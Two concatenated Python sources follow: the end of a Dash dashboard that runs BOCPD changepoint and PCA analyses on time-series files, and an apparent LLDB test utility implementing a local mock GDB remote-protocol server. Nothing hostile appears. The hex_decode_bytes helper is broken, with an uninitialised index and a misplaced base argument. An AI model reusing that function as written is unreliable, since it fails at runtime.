Percentage =Misc.round_sig(DatM.CheckLog(RawDir,AlphaDir),2)
return "%s" % (Percentage)+"\u0025" , Percentage
################################################################################################################
# Callbacks Tab 4:
################################################################################################################
#######################
# Dropdowns
#######################
#Update options for dropdown element for variables in Raw graphs
@app.callback(
[Output('BOCPDColName-dropdown','options'),Output('BOCPDColName-dropdown','value')],
[Input('BOCPDStrSearch', "value")],
[State('RawDirect','children')],
)
def update_dropdowns(StrSearch, RawDir):
'''
Update options for dropdown element for variables in BOCPD graphs
Parameters:
StrSearch (float): Key substring to index files by
RawDir (float): Files directory
Returns:
Dropdowns (options): List of possible dropdowns
Value (value): Initial selected value
'''
global DefaultFeature
DefaultFeature = StrSearch
Files = DatM.GlobDirectory(RawDir)
KeySelected = Misc.PatternsList(StrSearch, Files)
if len(KeySelected) > 0:
Value = KeySelected[0]
else:
KeySelected = Files
Value = None
return [{'label':"Variable: %s" % (name), 'value':name} for name in KeySelected], Value
#######################
# Load data
#######################
#Update RawAlphas data
app.callback(
Output('BOCPDRawData', 'children'),
[Input('RawDirect','children'), Input('BOCPDColName-dropdown', 'value')]
)(LoadDataAfterDropdowns)
#Update BOCPD data
@app.callback(
[Output('BOCPDData', 'children'), Output("Spinner-tab4-A","children")],
[Input("BOCPDRun","n_clicks")],
[State('BOCPDRawData','children'), State("BOCPDDirect", "children"), State("RawDirect", "children")],
)
def LoadAlphasData(n_clicks, jsonified_data, BOCPDDirectory, RawDir):
'''
Update BOCPD data
Parameters:
clickData (dict): Click Data
jsonified_data (json): Jsonified data
BOCPDDirectory (str): BOCPD Directory
RawDirectory (str): Raw Directory
Returns:
JSON (json) : jsonified data
spinner (dcc.spiner): Spinner object
'''
if jsonified_data not in ["0", 0, None, "None"] and n_clicks not in [None]:
#Un json data
data = pd.read_json(jsonified_data, orient='split')
#Remove Timezone info that read_json puts in
data.index = data.index.tz_localize(None)
Data_i_Name = data.columns[0]
# Statistics of interest
WindowParameters = CalcStats.CalcStats(data[Data_i_Name].dropna())
units = Misc.CalcUnits(WindowParameters["Rate"],WindowParameters["RateUnit"])
FileExists = DatM.CheckExists(RawDir, BOCPDDirectory, Data_i_Name)
if FileExists == True:
BOCPDdf = DatM.LoadData(BOCPDDirectory, Data_i_Name)
else:
#Error estimated on mean devition beween points
errs = Misc.errCalculation(data, WindowParameters["RateUnit"], False)
errs = np.sqrt(errs[1:]**2+errs[:-1]**2)
BOCPDdf, R_Max, Ps = BOCPD.bocd(data[Data_i_Name].diff(1).values[1:], BOCPD_errsScale*errs)
BOCPDdf = pd.DataFrame(BOCPDdf[:,:], index=data.index[1:])
writer = pd.ExcelWriter("%s%s%s.xlsx" % (BOCPDDirectory, os.sep, Data_i_Name), mode="w")
BOCPDdf.to_excel(writer)
writer.save()
Rmaxdf = pd.DataFrame(data={"R_Max":R_Max, "P":Ps}, index=data.index[1:])
writer = pd.ExcelWriter("%s%s%s_R_Max.xlsx" % (BOCPDDirectory, os.sep, Data_i_Name), mode="w")
Rmaxdf.to_excel(writer)
writer.save()
return BOCPDdf.to_json(date_format='iso', orient='split'), ""
else:
return "0", ""
#######################
# Raw Plots
#######################
#Update Alpha graphs selected
@app.callback(
[Output('BOCPDRawGraph', 'figure'), Output("BOCPDDataSummary","children")],
[Input('BOCPDRawData','children'), Input('BOCPDGraph', 'clickData')],
)
def update_graph(jsonified_data, clickData):
'''
Update BOCPD Raw graph
Parameters:
jsonified_data (json): Jsonified data
clickData (dict): Clickdata
Returns:
Fig (dcc.Graph) : Figure element
JSON (json) : jsonified summary data for display
'''
if jsonified_data not in ["0",0, None, "None"]:
#Un json data
data = pd.read_json(jsonified_data, orient='split')
#Remove Timezone info that read_json puts in
data.index = data.index.tz_localize(None)
Data_i_Name = data.columns[0]
#Click data
WindowParameters = CalcStats.CalcStats(data[Data_i_Name].dropna())
if clickData == None:
seqlen = 0
endval = data.index[-1]
startval = data.index[0]
else:
seqlen = int(clickData["points"][0]["y"])
endval = Misc.getDateTimeFromString(clickData["points"][0]["x"]) + Misc.timedeltaOneUnit(WindowParameters["Rate"],WindowParameters["RateUnit"])
startval = endval - seqlen*Misc.timedeltaOneUnit(WindowParameters["Rate"],WindowParameters["RateUnit"])
if startval < data.index[0] or endval > data.index[-1]:
seqlen = 0
endval = data.index[-1]
startval = data.index[0]
WindowParameters = CalcStats.CalcStats(data[Data_i_Name][startval:endval].dropna())
Fig = DashPlots.CreateRawFig(data, BOCPD_errsScale, Data_i_Name, WindowParameters, FigHeightPX/2)
return Fig, json.dumps(WindowParameters)
else:
return DashPlots.EmptyFig(FigHeightPX/2), json.dumps(CalcStats.CalcStatsEmpty())
#Update Alpha graphs selected
@app.callback(
[Output('BOCPDGraph', 'figure'),Output("BOCPDBOCPDDataSummary","children")],
[Input('BOCPDData','children')],
[State('BOCPDRawData','children')]
)
def update_graph(jsonified_dataBOCPD,jsonified_data):
'''
Update BOCPD graph
Parameters:
jsonified_dataAlphas (json): Jsonified Alpha data
jsonified_data (json): Jsonified data
Returns:
Fig (dcc.Graph) : Figure element
JSON (json) : jsonified summary data for display
'''
if jsonified_dataBOCPD not in ["0",0, None, "None"] and jsonified_data not in ["0",0, None, "None"]:
#Un json data
data = pd.read_json(jsonified_data, orient='split')
data.index = data.index.tz_localize(None)
Data_i_Name = data.columns[0]
# Statistics of interest
WindowParameters = CalcStats.CalcStats(data[Data_i_Name].dropna())
WindowParameters["Start"] = Misc.unixTimeMillis(data.index[0])
WindowParameters["End"] = Misc.unixTimeMillis(data.index[-1])
BOCPDdf = pd.read_json(jsonified_dataBOCPD, orient='split')
BOCPDdf.index = BOCPDdf.index.tz_localize(None)
R_Max = np.argmax(BOCPDdf.values,axis=1)
Lines = BOCPDdf.index[np.argwhere(R_Max == 0).reshape(-1)]
if len(Lines) > 20:
Lines = []
Fig = DashPlots.CreateBOCPDFig(BOCPDdf, R_Max, Lines, WindowParameters, BOCPD_tol, FigHeightPX/2)
else:
Fig = DashPlots.CreateBOCPDFig(BOCPDdf, R_Max, Lines, WindowParameters, BOCPD_tol, FigHeightPX/2)
Stats = CalcStats.CalcBOCPDStats(R_Max, BOCPD_tol)
if SaveFigs == 1:
Name = Data_i_Name
NameDate = "_%s_%s" % (BOCPDdf.index[0].strftime("%d%m%Y"),BOCPDdf.index[-1].strftime("%d%m%Y"))
p1 = Process(target=Graphing.plotMATPLOTLIBBOCPDHeat, args=[BOCPDdf.index, data[Data_i_Name].dropna().values[1:],data["Error"].dropna().values[1:], R_Max, BOCPDdf.values, BOCPD_tol, Misc.timedeltaOneUnit(WindowParameters["Rate"],WindowParameters["RateUnit"]), [BOCPDdf.index[0],BOCPDdf.index[-1]], [0,int(max(R_Max)*1.2)], Lines, "Time, t", Data_i_Name, "cachefiles"+os.sep+"BOCPD", Name+NameDate, True])
p1.start()
p1.join()
return Fig, json.dumps(Stats)
else:
return DashPlots.EmptyFig(FigHeightPX/2), json.dumps(CalcStats.CalcBOCPDStatsEmpty())
#######################
# Summary stats
#######################
@app.callback(
Output('BOCPDTable', 'children'),
[Input("BOCPDDataSummary","children"),Input("BOCPDBOCPDDataSummary","children")]
)
def update_graph(Parameters, BOCPDStats):
'''
Load paramters into summary column
Parameters:
Parameters (json): Parameters summarising Raw data
BOCPDStats (json): Parameters summarising BOCPD data
Returns:
Dict (dict): Parameters summarising Raw data
'''
Parameters = json.loads(Parameters)
BOCPDStats = json.loads(BOCPDStats)
return build_BOCPDdatasummary(Parameters, BOCPDStats)
#######################
# Progress
#######################
#Callback to update processbar
@app.callback(
[Output("BOCPDProcess-Progress","children"), Output("BOCPDProcess-Progress","value")],
[Input("intervalMid","n_intervals")],
[State("RawDirect", "children"),State('BOCPDDirect','children')]
)
def update_graph(n_intervals, RawDir, BOCPDDirectory):
'''
Progess bar updater
Parameters:
n_interval (): Interval pulse
RawDir (str): Raw data directory
BOCPDDir (str): Alpha data directory
Returns:
Percent (str): Percentage compleation
value (float): Percentage compleation
'''
Percentage =Misc.round_sig(DatM.CheckLog(RawDir,BOCPDDirectory),2)
return "%s" % (Percentage)+"\u0025" , Percentage
#######################
# Run all BOCPD
#######################
#Run all when button pushed.
@app.callback(
[Output("BOCPDProcess-Button","children"),Output("Spinner-tab4-B", "children")],
[Input('BOCPDProcess-Button','n_clicks')],
[State('BOCPDProcess-Button','children'), State('RawDirect','children'), State('BOCPDDirect','children')],
)
def update_graph(NClicks, ButtonState, RawDir, BOCPDDirectory):
'''
Run all BOCPD anaylsis
Parameters:
NClicks (dict): Clickdata
ButtonState (str): Button text
RawDir (str): Raw data directory
BOCPDDir (str): BOCPD data directory
Returns:
ButtonStr (str) : Button text
Spinner (dcc.spinner) : spinner object to display while loading
'''
if NClicks not in [0, "0", None, "None"]:
Files = DatM.GlobDirectory(RawDir)
for Data_i_Name in Files:
FileExists = DatM.CheckExists(RawDir, BOCPDDirectory, Data_i_Name)
if FileExists == True:
continue
else:
#Run Anaylsis
data = DatM.LoadData(RawDir, Data_i_Name)
WindowParameters = CalcStats.CalcStats(data)
#Error estimated on mean devition beween points
errs = Misc.errCalculation(data, WindowParameters["RateUnit"], False)
errs = np.sqrt(errs[1:]**2+errs[:-1]**2)
BOCPDdf, R_Max, Ps = BOCPD.bocd(data[Data_i_Name].diff(1).values[1:], BOCPD_errsScale*errs)
BOCPDdf = pd.DataFrame(BOCPDdf[:,:], index=data.index[1:])
writer = pd.ExcelWriter("%s%s%s.xlsx" % (BOCPDDirectory, os.sep, Data_i_Name), mode="w")
BOCPDdf.to_excel(writer)
writer.save()
Rmaxdf = pd.DataFrame(data={"R_Max":R_Max, "P":Ps}, index=data.index[1:])
writer = pd.ExcelWriter("%s%s%s_R_Max.xlsx" % (BOCPDDirectory, os.sep, Data_i_Name), mode="w")
Rmaxdf.to_excel(writer)
writer.save()
return "Done", ""
else:
return ButtonState, ""
################################################################################################################
# Callbacks Tab 5:
################################################################################################################
#######################
# Dropdowns
#######################
#Update options for dropdown element for variables in PCA graphs
@app.callback(
[Output('PCAColName-dropdown','options'),Output('PCAColName-dropdown','value')],
[Input('PCAStrSearch', "value"),Input('PCATypeSelect','value')],
)
def update_dropdowns(StrSearch, Type):
'''
Update options for dropdown element for variables in PCA graphs
Parameters:
StrSearch (float): Key substring to index files by
RawDir (float): Files directory
Returns:
Dropdowns (options): List of possible dropdowns
Value (value): Initial selected value
'''
if Type == "Alpha":
Dir = "data"+os.sep+"AlphaData"
if Type == "Raw":
Dir = "data"+os.sep+"RawData"
if Type == "BOCPD":
Dir = "data"+os.sep+"BOCPDData"
Files = DatM.GlobDirectory(Dir)
KeySelected = Misc.PatternsList(StrSearch, Files)
if Type == "BOCPD":
KeySelected = Misc.PatternsList("R_Max", KeySelected)
global DefaultFeature
DefaultFeature = StrSearch
global DefaultDataType
DefaultDataType = Type
return [{'label':"Variable: %s" % (name), 'value':name} for name in Files], KeySelected
@app.callback(
[Output('PCATestFeature-dropdown','options'), Output('PCATestFeature-dropdown','value')],
[Input('PCAStrSearch', "value"),Input('PCATypeSelect','value')],
)
def update(StrSearch, Type):
'''
Marginal dropdown
Parameters:
StrSearch (str): Search string
Type (str): "Alpha" "Raw" "BOCPD"
Returns:
Dropdowns (options): List of possible dropdowns
Value (value): Initial selected value
'''
if Type == "Alpha":
Dir = "data"+os.sep+"AlphaData"
if Type == "Raw":
Dir = "data"+os.sep+"RawData"
if Type == "BOCPD":
Dir = "data"+os.sep+"BOCPDData"
Files = DatM.GlobDirectory(Dir)
KeySelected = Misc.PatternsList(StrSearch, Files)
if Type == "BOCPD":
KeySelected = Misc.PatternsList("R_Max", KeySelected)
return [{'label':"Variable: %s" % (name), 'value':name} for name in KeySelected], None
#######################
# RunPCA
#######################
@app.callback(
[Output('PCARun','children'), Output("PCAData","children"), Output("PCATsData","children"), Output("PCAQsData","children"), Output("DataSummary","children"), Output("PCADataSummary","children"), Output("Spinner-tab5-A", "children")],
[Input('PCARun','n_clicks')],
[State('PCATypeSelect','value'), State('PCAColName-dropdown','value'), State('PCAStrSearch', "value")]
)
def update_graph(nclicks, Type, Vars, StringSearch):
'''
Run PCA anaylsis
Parameters:
nclick (int): Number of times button has been clicked
Type (str): "Alpha" "Raw" "BOCPD"
Vars (list): List of features
StrSearch (str): Search string
Returns:
PCARun (str): Button text
PCAData (json): jsonified PCA data
PCATsData (json): jsonified Ts data
PCAQsData (json): jsonified Q data
Dict (dict): Parameters summarising Raw data
Dict (dict): Parameters summarising PCA data
spinner (dcc.spinner): spinner object for when loading
'''
if Type == "Alpha":
Dir = "data"+os.sep+"AlphaData"
if Type == "Raw":
Dir = "data"+os.sep+"RawData"
if Type == "BOCPD":
Dir = "data"+os.sep+"BOCPDData"
if nclicks in [None]:
return "Run", "", "", "", json.dumps(CalcStats.CalcStatsEmpty()), json.dumps(CalcStats.CalcPCAStatsEmpty()), ""
PCA_NPCA, PCA_AlphaLim, _ = Misc.GetOptimzed(PCA_FittedParams, Type, StringSearch, DefaultMetric, Vars)
#Get crashing cases out of the way
if Vars in [None,"None"]: #More Features not selected
return "Run", "", "", "", json.dumps(CalcStats.CalcStatsEmpty()), json.dumps(CalcStats.CalcPCAStatsEmpty()), ""
elif PCA_NPCA > len(Vars): #More PCA components than dimensions
return "Run", "", "", "", json.dumps(CalcStats.CalcStatsEmpty()), json.dumps(CalcStats.CalcPCAStatsEmpty()), ""
else:
TestCol = Vars[0]
#Load Datas into one large DF
df, _ = DatM.PCALOAD(Dir,Vars)
if df.empty: #Checks to make sure senible to plot
return "Run", "", "", "", json.dumps(CalcStats.CalcStatsEmpty()), json.dumps(CalcStats.CalcPCAStatsEmpty()), ""
WindowParameters = CalcStats.CalcStats(df.iloc[:,0])
window = Misc.WindowSize(WindowParameters["Rate"], WindowParameters["RateUnit"], PCA_WindowUnit, PCA_WindowN)
dtMeasure = Misc.timedeltaOneUnit(WindowParameters["Rate"], WindowParameters["RateUnit"])
if df.shape[0] < window:
return "Run", "", "", "", json.dumps(CalcStats.CalcStatsEmpty()), json.dumps(CalcStats.CalcPCAStatsEmpty()), ""
DataPCA, Ts, Qs, Variances = PCA.PCA(df, PCA_NPCA, window)
RegionsAll, _, _, _ = PCA.PCARegionsCollect(Ts, Qs, dtMeasure, PCA_AlphaLim, PCA_NPCA, TestCol)
#Just care about time periods
PCAStats = CalcStats.CalcPCAStats(Ts, Qs, PCA_NPCA, Variances, RegionsAll)
return "Run", DataPCA.to_json(date_format='iso', orient='split'), Ts.to_json(date_format='iso', orient='split'), Qs.to_json(date_format='iso', orient='split'), json.dumps(WindowParameters), json.dumps(PCAStats), ""
#######################
# Graphing
#######################
@app.callback(
[Output('PCAGraph', 'figure') ,Output('RatesGraph', 'figure')],
[Input("PCATestFeature-dropdown", "value"),Input("PCAData","children"), Input("PCATsData","children"), Input("PCAQsData","children")],
[State("DataSummary","children"),State('PCATypeSelect','value'), State('PCAStrSearch', "value")]
)
def update_graph(MarginalFeature, DataPCA, Ts, Qs, WindowParameters, Type, StringSearch):
'''
Plot PCA graphs
Parameters:
MarginalFeature (str): Feature to plot marginalised
DataPCA (json): jsonified PCA data
Ts (json): jsonified Ts data
Qs: (json): jsonified Q data
WindowParameters (json): summary of raw data
Type (str): "Alpha" "Raw" "BOCPD"
StrSearch (str): Search string
Returns:
PCAGraph (dcc.graph): Graph of PCA features
RatesGraph (dcc.graph): Graph of rolling rates
'''
if Ts in [None, "", "0", 0] or Qs in [None, "", "0", 0]:
return DashPlots.EmptyFig(FigHeightPX/3),DashPlots.EmptyFig(2*FigHeightPX/3)
else:
DataPCA = pd.read_json(DataPCA, orient='split')
Ts = pd.read_json(Ts, orient='split')
Qs = pd.read_json(Qs, orient='split')
WindowParameters = json.loads(WindowParameters)
if MarginalFeature not in DataPCA.columns:
TestCol = DataPCA.columns[0]
else:
TestCol = MarginalFeature
PCA_NPCA, PCA_AlphaLim, PCA_Thresh = Misc.GetOptimzed(PCA_FittedParams, Type, StringSearch, DefaultMetric, DataPCA.columns)
NDur = 0
if Type == "BOCPD":
NDur = -1
dtMeasure = Misc.timedeltaOneUnit(WindowParameters["Rate"], WindowParameters["RateUnit"])
RegionsAll, RegionsSpecific, RatesAll, RatesSpecific = PCA.PCARegionsCollect(Ts, Qs, dtMeasure, PCA_AlphaLim, PCA_NPCA, TestCol, NDur)
if MarginalFeature not in [None]:
FigPCA = DashPlots.CreatePCADataFig(DataPCA, RegionsAll, RegionsSpecific, MarginalFeature, NDur, int(FigHeightPX/3))
FigRates = DashPlots.CreateRatesFig("Rate", PCA_Thresh, RatesAll, RatesSpecific, RegionsAll, RegionsSpecific, MarginalFeature, NDur, int(2*FigHeightPX/3))
else:
FigPCA = DashPlots.CreatePCADataFig(DataPCA, RegionsAll, 0, MarginalFeature, NDur, int(FigHeightPX/3))
FigRates = DashPlots.CreateRatesFig("Rate", PCA_Thresh, RatesAll, RatesSpecific, RegionsAll, 0, MarginalFeature, NDur, int(2*FigHeightPX/3))
if SaveFigs == 1 and len(DataPCA.columns) < 6:
Name = ""
for V in DataPCA.columns:
Name +=V
XRange = [DataPCA.index[0],DataPCA.index[-1]]
NameDate = "_%s_%s" % (XRange[0].strftime("%d%m%Y"), XRange[-1].strftime("%d%m%Y"))
p1 = Process(target=Graphing.plotMATPLOTLIBPCA, args=[DataPCA, Ts, Qs, XRange, [1e-16,2], [PCA_AlphaLim], RegionsAll, RegionsSpecific, "cachefiles"+os.sep+"PCA", Name+NameDate, True])
p1.start()
p1.join()
return FigPCA, FigRates
#######################
# Summary stats
#######################
@app.callback(
Output('PCATable', 'children'),
[Input("DataSummary","children"),Input("PCADataSummary","children")]
)
def update_graph(Parameters, PCAStats):
'''
Load paramters into summary column
Parameters:
Parameters (json): Parameters summarising Raw data
PCAStats (json): Parameters summarising PCA data
Returns:
Dict (dict): Parameters summarising Raw data
'''
Parameters = json.loads(Parameters)
PCAStats = json.loads(PCAStats)
return build_PCAdatasummary(Parameters, PCAStats)
#######################
# Cache
#######################
@app.callback(
Output("JSON_Cache_Output", "children"),
[Input("PCADataSummary","children")],
[State("DataSummary","children"), State('PCARun','n_clicks'), State('PCATypeSelect','value'), State('PCAColName-dropdown','value'), State("PCATsData","children"), State("PCAQsData","children"), State('PCAStrSearch', "value")],
)
def update_graph(PCAStats, WinPara, n_clicks, Type, Vars, Ts, Qs, StringSearch):
'''
Plot PCA graphs
Parameters:
PCAStats (json): summary of PCA data
WinPara (json): summary of raw data
n_clicks (int): Number of clicks on run button
Type (str): "Alpha" "Raw" "BOCPD"
Vars (list): List of features
Ts (json): jsonified Ts data
Qs: (json): jsonified Q data
StrSearch (str): Search string
Returns:
A (int): 0
'''
if SaveCache == 0:
return 0
if Ts in [None, 0, "0", "None", ""]:
return 0
if n_clicks not in [None] or Vars not in [None]:
if len(Vars) == 0:
return 0
PCAStats = json.loads(PCAStats)
WinPara = json.loads(WinPara)
Ts = pd.read_json(Ts, orient='split')
Qs = pd.read_json(Qs, orient='split')
PCA_NPCA, PCA_AlphaLim, PCA_Thresh = Misc.GetOptimzed(PCA_FittedParams, Type, StringSearch, DefaultMetric, Vars)
dtMeasure = Misc.timedeltaOneUnit(WinPara["Rate"], WinPara["RateUnit"])
RegionsAll, _, _, _ = PCA.PCARegionsCollect(Ts, Qs, dtMeasure, PCA_AlphaLim, PCA_NPCA, 0)
STARTS = []
ENDS = []
DURATIONS = []
for Ri in range(RegionsAll.shape[0]):
STARTS.append(Misc.unixToDatetime(RegionsAll.iloc[Ri]["Starts"]).strftime('%d/%m/%Y %H:%M:%S'))
ENDS.append(Misc.unixToDatetime(RegionsAll.iloc[Ri]["Stops"]).strftime('%d/%m/%Y %H:%M:%S'))
DURATIONS.append("%s" % RegionsAll.iloc[Ri]["Duration"])
Name = "PCA"
FileName = "cachefiles"+os.sep+"%s.json" % (Name)
data_i = {}
WinPara["Start"] = "%s" % Misc.unixToDatetime(WinPara["Start"]).strftime('%d/%m/%Y %H:%M:%S')
WinPara["End"] = "%s" % Misc.unixToDatetime(WinPara["End"]).strftime('%d/%m/%Y %H:%M:%S')
data_i["Time"] = "%s" % datetime.now().strftime('%d/%m/%Y %H:%M:%S')
data_i["Type"] = Type
data_i["Features"] = Vars
data_i["Stats"] = WinPara
data_i["PCAStats"] = PCAStats
data_i["Regions"] = []
data_i["Regions"].append({"Starts" : STARTS})
data_i["Regions"].append({"End" : ENDS})
data_i["Regions"].append({"Duration" : DURATIONS})
DatM.WriteCacheFile(FileName, data_i)
return 0
#######################
# Reset Folders data
#######################
def EmptyFolders():
'''
Delete local data and cache files
Parameters:
Returns:
A (int): Return if completed
'''
import glob
files = glob.glob('data'+os.sep+'*'+os.sep+'*.xlsx')
files += glob.glob('cachefiles'+os.sep+'*'+os.sep+'*.png')
files += glob.glob('cachefiles'+os.sep+'*.json')
for F in files:
print("Deleting %s" % F)
os.remove(F)
return 1
#######################
# argv
#######################
def main(argv):
'''
Python run parameters
Parameters:
argv (list): Python terminal input args
Returns:
Delete (bool): T/F Reset folders data
'''
#Defualt parameters
Delete=False
try:
opts, args = getopt.getopt(argv,"D",["Delete="])
except getopt.GetoptError:
print('python app.py -D')
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print('python app.py -D')
sys.exit()
elif opt in ("-D"):
Delete = True
return Delete
if __name__ == "__main__":
Delete = main(sys.argv[1:])
if Delete:
EmptyFolders()
print("Run app dashboard")
app.config.suppress_callback_exceptions = True
#Run as debug mode
app.run_server(debug=True, port=8050, threaded= True)
#Run normally
#app.run_server(host= "0.0.0.0", port=8050, threaded= True)
|
gdbclientutils.py | import os
import os.path
import threading
import socket
import lldb
import binascii
import traceback
from lldbsuite.support import seven
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbtest_config
def checksum(message):
"""
Calculate the GDB server protocol checksum of the message.
The GDB server protocol uses a simple modulo 256 sum.
"""
check = 0
for c in message:
check += ord(c)
return check % 256
def frame_packet(message):
"""
Create a framed packet that's ready to send over the GDB connection
channel.
Framing includes surrounding the message between $ and #, and appending
a two character hex checksum.
"""
return "$%s#%02x" % (message, checksum(message))
def escape_binary(message):
"""
Escape the binary message using the process described in the GDB server
protocol documentation.
Most bytes are sent through as-is, but $, #, and { are escaped by writing
a { followed by the original byte mod 0x20.
"""
out = ""
for c in message:
d = ord(c)
if d in (0x23, 0x24, 0x7d):
out += chr(0x7d)
out += chr(d ^ 0x20)
else:
out += c
return out
def hex_encode_bytes(message):
"""
Encode the binary message by converting each byte into a two-character
hex string.
"""
out = ""
for c in message:
out += "%02x" % ord(c)
return out
def hex_decode_bytes(hex_bytes):
"""
Decode the hex string into a binary message by converting each two-character
hex string into a single output byte.
"""
out = ""
hex_len = len(hex_bytes)
while i < hex_len - 1:
out += chr(int(hex_bytes[i:i + 2]), 16)
i += 2
return out
class MockGDBServerResponder:
"""
A base class for handling client packets and issuing server responses for
GDB tests.
This handles many typical situations, while still allowing subclasses to
completely customize their responses.
Most subclasses will be interested in overriding the other() method, which
handles any packet not recognized in the common packet handling code.
"""
registerCount = 40
packetLog = None
def __init__(self):
self.packetLog = []
def respond(self, packet):
"""
Return the unframed packet data that the server should issue in response
to the given packet received from the client.
"""
self.packetLog.append(packet)
if packet is MockGDBServer.PACKET_INTERRUPT:
return self.interrupt()
if packet == "c":
return self.cont()
if packet.startswith("vCont;c"):
return self.vCont(packet)
if packet[0] == "A":
return self.A(packet)
if packet[0] == "g":
return self.readRegisters()
if packet[0] == "G":
# Gxxxxxxxxxxx
# Gxxxxxxxxxxx;thread:1234;
return self.writeRegisters(packet[1:].split(';')[0])
if packet[0] == "p":
regnum = packet[1:].split(';')[0]
return self.readRegister(int(regnum, 16))
if packet[0] == "P":
register, value = packet[1:].split("=")
return self.writeRegister(int(register, 16), value)
if packet[0] == "m":
addr, length = [int(x, 16) for x in packet[1:].split(',')]
return self.readMemory(addr, length)
if packet[0] == "M":
location, encoded_data = packet[1:].split(":")
addr, length = [int(x, 16) for x in location.split(',')]
return self.writeMemory(addr, encoded_data)
if packet[0:7] == "qSymbol":
return self.qSymbol(packet[8:])
if packet[0:10] == "qSupported":
return self.qSupported(packet[11:].split(";"))
if packet == "qfThreadInfo":
return self.qfThreadInfo()
if packet == "qsThreadInfo":
return self.qsThreadInfo()
if packet == "qC":
return self.qC()
if packet == "QEnableErrorStrings":
return self.QEnableErrorStrings()
if packet == "?":
return self.haltReason()
if packet == "s":
return self.haltReason()
if packet[0] == "H":
return self.selectThread(packet[1], int(packet[2:], 16))
if packet[0:6] == "qXfer:":
obj, read, annex, location = packet[6:].split(":")
offset, length = [int(x, 16) for x in location.split(',')]
data, has_more = self.qXferRead(obj, annex, offset, length)
if data is not None:
return self._qXferResponse(data, has_more)
return ""
if packet.startswith("vAttach;"):
pid = packet.partition(';')[2]
return self.vAttach(int(pid, 16))
if packet[0] == "Z":
return self.setBreakpoint(packet)
if packet.startswith("qThreadStopInfo"):
threadnum = int (packet[15:], 16)
return self.threadStopInfo(threadnum)
if packet == "QThreadSuffixSupported":
return self.QThreadSuffixSupported()
if packet == "QListThreadsInStopReply":
return self.QListThreadsInStopReply()
if packet.startswith("qMemoryRegionInfo:"):
return self.qMemoryRegionInfo()
if packet == "qQueryGDBServer":
return self.qQueryGDBServer()
if packet == "qHostInfo":
return self.qHostInfo()
if packet == "qGetWorkingDir":
return self.qGetWorkingDir()
if packet == "qOffsets":
return self.qOffsets();
if packet == "qsProcessInfo":
return self.qsProcessInfo()
if packet.startswith("qfProcessInfo"):
return self.qfProcessInfo(packet)
return self.other(packet)
def qsProcessInfo(self):
return "E04"
def qfProcessInfo(self, packet):
return "E04"
def qGetWorkingDir(self):
return "2f"
def qOffsets(self):
return ""
def qHostInfo(self):
return "ptrsize:8;endian:little;"
def qQueryGDBServer(self):
return "E04"
def interrupt(self):
raise self.UnexpectedPacketException()
def cont(self):
raise self.UnexpectedPacketException()
def vCont(self, packet):
raise self.UnexpectedPacketException()
def A(self, packet):
return ""
def readRegisters(self):
return "00000000" * self.registerCount
def readRegister(self, register):
return "00000000"
def writeRegisters(self, registers_hex):
return "OK"
def writeRegister(self, register, value_hex):
return "OK"
def readMemory(self, addr, length):
return "00" * length
def writeMemory(self, addr, data_hex):
return "OK"
def qSymbol(self, symbol_args):
return "OK"
def qSupported(self, client_supported):
return "qXfer:features:read+;PacketSize=3fff;QStartNoAckMode+"
def qfThreadInfo(self):
return "l"
def qsThreadInfo(self):
return "l"
def qC(self):
return "QC0"
def QEnableErrorStrings(self):
return "OK"
def haltReason(self):
# SIGINT is 2, return type is 2 digit hex string
return "S02"
def qXferRead(self, obj, annex, offset, length):
return None, False
def _qXferResponse(self, data, has_more):
return "%s%s" % ("m" if has_more else "l", escape_binary(data))
def vAttach(self, pid):
raise self.UnexpectedPacketException()
def selectThread(self, op, thread_id):
return "OK"
def setBreakpoint(self, packet):
raise self.UnexpectedPacketException()
def threadStopInfo(self, threadnum):
return ""
def other(self, packet):
# empty string means unsupported
return ""
def QThreadSuffixSupported(self):
return ""
def QListThreadsInStopReply(self):
return ""
def qMemoryRegionInfo(self):
return ""
"""
Raised when we receive a packet for which there is no default action.
Override the responder class to implement behavior suitable for the test at
hand.
"""
class UnexpectedPacketException(Exception):
pass
class MockGDBServer:
"""
A simple TCP-based GDB server that can test client behavior by receiving
commands and issuing custom-tailored responses.
Responses are generated via the .responder property, which should be an
instance of a class based on MockGDBServerResponder.
"""
responder = None
port = 0
_socket = None
_client = None
_thread = None
_receivedData = None
_receivedDataOffset = None
_shouldSendAck = True
def __init__(self, port = 0):
self.responder = MockGDBServerResponder()
self.port = port
self._socket = socket.socket()
def start(self):
# Block until the socket is up, so self.port is available immediately.
# Then start a thread that waits for a client connection.
addr = ("127.0.0.1", self.port)
self._socket.bind(addr)
self.port = self._socket.getsockname()[1]
self._socket.listen(1)
self._thread = threading.Thread(target=self._run)
self._thread.start()
def stop(self):
self._socket.close()
self._thread.join()
self._thread = None
def _run(self):
# For testing purposes, we only need to worry about one client
# connecting just one time.
try:
# accept() is stubborn and won't fail even when the socket is
# shutdown, so we'll use a timeout
self._socket.settimeout(20.0)
client, client_addr = self._socket.accept()
self._client = client
# The connected client inherits its timeout from self._socket,
# but we'll use a blocking socket for the client
self._client.settimeout(None)
except:
return
self._shouldSendAck = True
self._receivedData = ""
self._receivedDataOffset = 0
data = None
while True:
try:
data = seven.bitcast_to_string(self._client.recv(4096))
if data is None or len(data) == 0:
break
self._receive(data)
except Exception as e:
print("An exception happened when receiving the response from the gdb server. Closing the client...")
traceback.print_exc()
self._client.close()
break
def _receive(self, data):
"""
Collects data, parses and responds to as many packets as exist.
Any leftover data is kept for parsing the next time around.
"""
self._receivedData += data
try:
packet = self._parsePacket()
while packet is not None:
self._handlePacket(packet)
packet = self._parsePacket()
except self.InvalidPacketException:
self._client.close()
def _parsePacket(self):
"""
Reads bytes from self._receivedData, returning:
- a packet's contents if a valid packet is found
- the PACKET_ACK unique object if we got an ack
- None if we only have a partial packet
Raises an InvalidPacketException if unexpected data is received
or if checksums fail.
Once a complete packet is found at the front of self._receivedData,
its data is removed form self._receivedData.
"""
data = self._receivedData
i = self._receivedDataOffset
data_len = len(data)
if data_len == 0:
return None
if i == 0:
# If we're looking at the start of the received data, that means
# we're looking for the start of a new packet, denoted by a $.
# It's also possible we'll see an ACK here, denoted by a +
if data[0] == '+':
self._receivedData = data[1:]
return self.PACKET_ACK
if ord(data[0]) == 3:
self._receivedData = data[1:]
return self.PACKET_INTERRUPT
if data[0] == '$':
i += 1
else:
raise self.InvalidPacketException(
"Unexpected leading byte: %s" % data[0])
# If we're looking beyond the start of the received data, then we're
# looking for the end of the packet content, denoted by a #.
# Note that we pick up searching from where we left off last time
while i < data_len and data[i] != '#':
i += 1
